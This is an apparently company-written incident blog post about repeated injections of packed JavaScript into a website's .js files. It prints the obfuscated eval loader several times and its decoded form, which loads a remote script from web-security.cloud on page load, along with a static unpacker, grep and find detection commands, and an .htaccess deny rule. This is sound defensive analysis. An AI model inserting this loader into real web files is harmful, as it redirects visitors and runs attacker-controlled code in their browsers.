
Decoding Website Defacement Attacks: Unmasking the Threat

Background

We found weird behaviour on our websites: links no longer went to the proper URL on our own domain but to a third-party link instead. That was quite alarming. We then checked Google Analytics, and traffic had dropped. Something was not right here!

We started to look further into this issue.

Last updated - 27/05/2023: added the Update – 7 section.

The Detail

We checked the files on the server and found a change dated 17/04/2022. That was strange, as we had not changed the files.

We opened the modified file and found the following at the end of the .js file. We looked at the backup, and it was different; this code was not there:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

We had a similar situation in late September 2021; at that time, the .php files were attacked.

We do not know how they appended this extra code at the end of the .js files.

However, there were three places the attacker could have got in through:

  • The hosting VM using cPanel, which we did not fully control
  • The custom-coded PHP web application
  • The WordPress websites

To mitigate this, we moved the custom PHP application to a different VM that we fully control and that has no cPanel, and the WordPress site to another VM that we fully control and that has no cPanel. We also set up alerts that check the files for any modification, deletion or addition.

UPDATE – 1

This happened again on 4th June 2022, this time in the .js files:
;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

Investigating these extra codes further, we decoded them with the unpacker at matthewfl.com.

The code translates to:

document.addEventListener('DOMContentLoaded', function(){
    if(typeof window.web_security == "undefined"){
        var s = document.createElement("script");
        s.src = "//web-security.cloud/event?l=115";
        document.head.appendChild(s);
        window.web_security = "success";
    }
}, false);

In plain terms: once the page has loaded, and unless it has already run (the window.web_security flag), it injects a script tag that fetches a second-stage script from web-security.cloud. That remote script is what sends visitors to the third-party links, and because it is fetched at page load, the attacker can change what it does at any time without touching our files again. The protocol-relative // URL works on both http and https pages.
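The following is an added example (our code, not code from the article or from matthewfl.com): a small static unpacker that reverses the p,a,c,k,e,d format without ever running the payload, so it can be used on a trusted workstation against files copied off the server. The packed sample is the line shown above; the function names (findPackedBlobs, parsePacked, unpack, extractScriptSources) are ours. It handles the general packer format with any radix, not only the base-10 variant found here.

```javascript
// Added example (not from the article): static unpacker for the
// "eval(function(p,a,c,k,e,d){...})" format (Dean Edwards' packer). It decodes the
// appended blob WITHOUT running it, then pulls out the remote script URL as the IOC.

// Constructed sample: the packed line as it was found appended to the .js files.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))`;

// Every packed blob in a file's text (the attacker appended the same one several times).
function findPackedBlobs(fileText) {
  const re = /eval\(function\(p,a,c,k,e,d\)[\s\S]*?\.split\('\|'\),\d+,\{\}\)\)/g;
  return [...fileText.matchAll(re)].map(m => m[0]);
}

// Pull the four leading packer arguments out of the source text:
// p (the template), a (radix), c (word count) and k (the word list).
function parsePacked(src) {
  const m = src.match(/\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/);
  if (!m) return null;
  const unescape = s => s.replace(/\\(.)/g, '$1');   // \' inside the quoted template -> '
  return { p: unescape(m[1]), a: Number(m[2]), c: Number(m[3]), k: m[4].split('|') };
}

// The packer's key encoding: word index -> base-`radix` string using 0-9, a-z, then A-Z.
// The sample uses radix 10, so its keys are plain decimal numbers; this handles any radix.
function encodeKey(index, radix) {
  const digit = index % radix;
  const head = index < radix ? '' : encodeKey(Math.floor(index / radix), radix);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild the original source: substitute every token in the template with its word.
function unpack(src) {
  const parsed = parsePacked(src);
  if (!parsed) throw new Error('not a recognised p,a,c,k,e,d payload');
  const { p, a, c, k } = parsed;
  const words = new Map();
  for (let i = 0; i < c; i++) {
    const key = encodeKey(i, a);
    words.set(key, k[i] || key);   // an empty slot means the token stands for itself
  }
  // The same substitution the packer's own code performs, minus the eval
  return p.replace(/\b\w+\b/g, w => (words.has(w) ? words.get(w) : w));
}

// Remote script URLs assigned to .src in the decoded code: the indicator to search and block for
function extractScriptSources(js) {
  return [...js.matchAll(/\.src\s*=\s*["']([^"']+)["']/g)].map(m => m[1]);
}

console.log(unpack(PACKED_SAMPLE));
console.log('script sources:', extractScriptSources(unpack(PACKED_SAMPLE)));
```

Decoding this way, rather than pasting the blob into a browser console, matters because the packed wrapper ends in eval: anything that runs it executes the payload. The unpacker only does string substitution, so it is safe to run over every blob findPackedBlobs returns and to compare the decoded versions to spot variants.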

To find all affected files (.js or .php), run the following command and write the result to a file called suspiciousfiles.txt. The pattern is the start of the packer's word list, so it only catches the packed form of the code:

grep --include=\*.{js,php} -rnw '/var/www/[website_url]/public_html/' -e "s|document|web_security|window" > suspiciousfiles.txt

Go through that list and remove the extra codes manually, one by one.

UPDATE – 2

On 14th June 2022, as informed by our web developer, we upgraded the web application; one of the bug fixes was updating the jQuery library to close known JavaScript vulnerabilities.

We believed this incident was related to JavaScript vulnerabilities within this web application and hoped the upgrade would solve the issue. Note, though, that an outdated jQuery running in visitors' browsers cannot by itself modify files on the server; whatever appended the code had write access to the web root, so the server-side write path still had to be found.

UPDATE – 3

On 27 July 2022, the website was attacked again, only the .js files this time. Over 400 files had the extra code appended at the end. We managed to remove it manually.

UPDATE – 4

In November 2022, the website was attacked again, only the .js files. Over 400 files had the extra code appended at the end. We have not removed it yet, as we are waiting for the developer to investigate.

;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

We then started to look deeper for folders with write access, listing everything in the target folder that is not an image, a video or the .htaccess itself:

find /var/www/[website_url]/public_html/[target_folder] -type f \( ! -iname "*.jpg" -and ! -iname "*.png" -and ! -iname "*.jpeg" -and ! -iname "*.gif" -and ! -iname "*.webp" -and ! -iname ".htaccess" -and ! -iname "*.mp4" \)

No suspicious files turned up, only a handful of .html and .xml files. We looked at these one by one, and none is a threat.

We checked the .htaccess in that folder, and it does a good job of refusing requests for script files:

<Files ~ "\.(php|php2|php3|php4|php5|php7|phtml|pl|py|psp|js|jsp|cgi|util)$">
    Order deny,allow
    Deny From All
</Files>

Note what this rule does and does not cover. It stops Apache from serving (and executing) files with those extensions when they are requested directly, so a script dropped into that folder cannot be run by requesting it. It does nothing to stop a process that already has write access from appending to existing .js files elsewhere, and it only protects the folder it lives in. The Order/Deny directives are Apache 2.2 syntax; on Apache 2.4 they need mod_access_compat, and the native equivalent is Require all denied.

UPDATE – 5

A similar attack occurred on 11/01/2023. This time, we found that the .htaccess at the root level had been deleted. We are not sure yet whether it was removed accidentally during maintenance.

With that protection gone, a file called mini.php had been created.

UPDATE – 6

A similar attack occurred on 13/04/2023, but this time the appended code was not packed:

;
document.addEventListener('DOMContentLoaded', function(){
    if(typeof window.web_security == "undefined"){
        var s = document.createElement("script");
        s.src = "//web-security.cloud/event?l=115";
        document.head.appendChild(s);
        window.web_security = "success";
    }
}, false);
;

Because our maintenance (backup) folder had the same permissions as the live folders, it was modified as well. The fix is to keep backups as compressed archives, ideally outside the web root, rather than as a copy of the site's folder tree.

We also added a search on the loader's domain. The dot is escaped so it does not match any character, and the hyphen matters: the variable name in the code uses an underscore (web_security), but the domain uses a hyphen (web-security.cloud):

grep --include=\*.{js,php} -rnw '/var/www/[website_url]/public_html/' -e "web-security\.cloud" > suspiciousfiles_2.txt

UPDATE – 7

A similar attack occurred on 15/04/2023, again with the unpacked code appended (the same snippet as in Update – 6). The backup folder was modified again, which confirmed the need to keep backups as compressed archives. We re-ran the domain search:

grep --include=\*.{js,php} -rnw '/var/www/[website_url]/public_html/' -e "web-security\.cloud" > suspiciousfiles_2.txt

The End

If you have reached the end of this article, congratulations. Hopefully, we have shed some light on what you need to know by walking through this attack on our website.

This is not a fixed article. As on this journey, we learn as we go and rewrite parts of it, so please keep checking back on this article and our other tech posts.

We would also love to hear how you deal with situations like this and what IT-related challenges you face. Please feel free to comment on this article, or contact us on the Dewacorp website for IT support, application integration, application development or other IT-related work. Alternatively, you can have a casual chat on Dewachat. Let us know if you have any questions we can help with!

Big thank you for the photo by Tima Miroshnichenko on Pexels.
